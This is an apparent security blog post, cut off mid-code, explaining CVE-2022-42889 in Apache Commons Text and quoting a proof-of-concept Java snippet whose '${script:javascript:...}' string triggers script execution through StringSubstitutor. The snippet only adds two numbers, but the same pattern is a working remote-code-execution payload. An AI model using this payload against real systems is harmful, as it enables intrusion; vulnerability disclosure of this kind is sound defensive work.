Skip to content

CVE-2022-42889 | Apache Commons Text Vulnerability

This is a recent CVE that was assigned on October 13th, 2022 and has been assigned CVSS score of 9.8 out of 10 indicating the seriousness of the vulnerability. This is very similar to Log4j vulnerability but might not have a impact similar to Log4j. This vulnerability allows Remote Code Execution (RCE) on user supplied strings and it allows even to execute Javascript

POC for CVE-2022-42889

There is already a POC available on Github for this vulnerability created by Sean Wright over here –

This is a simple POC that when executed outputs sum of 195 and 324 which is 519. And this vulnerability is exploitable only when stringSubstitutor class is used in the code but there may be some other different versions of exploit already available in the wild which we may not be aware of

package com.seanwrightsec.poc;

import org.apache.commons.text.StringSubstitutor;

public class PoC {
    public static void main(String[] args) {
        StringSubstitutor stringSubstitutor = StringSubstitutor.createInterpolator();
        String output = stringSubstitutor.replace("PoC Output: ${script:javascript:195 + 324}");